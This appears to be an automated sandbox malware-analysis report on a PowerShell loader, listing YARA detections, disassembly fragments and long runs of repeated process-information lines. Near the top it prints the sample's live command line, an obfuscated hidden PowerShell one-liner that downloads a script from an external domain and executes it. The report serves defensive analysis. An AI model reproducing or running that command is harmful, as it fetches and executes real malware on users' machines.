Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.powershell.exe.69e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected MSILLoadEncryptedAssembly

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0670B67B push es; ret	4_2_0670B67C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0670B657 push es; iretd	4_2_0670B664
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0670B54F push es; retf	4_2_0670B550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06716CBB push es; iretd	4_2_06716CBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0671837F push es; retf	4_2_06718380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0671836B push es; retf	4_2_06718378
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06716B03 push es; retf	4_2_06716B04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710BB8 push esp; retf	4_2_06710BC1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06717073 push es; ret	4_2_06717074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_067294AA push edx; retf	4_2_067294AB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0672987F push es; retf	4_2_06729880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_068ECAC9 push 6406DB27h; retf 0072h	4_2_068ECAE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_068ECC60 pushad ; retf	4_2_068ECD6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_068ECD04 pushad ; retf	4_2_068ECD6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06943E1D push es; iretd	4_2_06943E28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06945F41 push es; ret	4_2_06945F48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_069488DA push 7C069271h; retf	4_2_069488E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003AF1F0 push eax; mov dword ptr [esp], 727D7C0Fh	10_2_003AF1F2

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

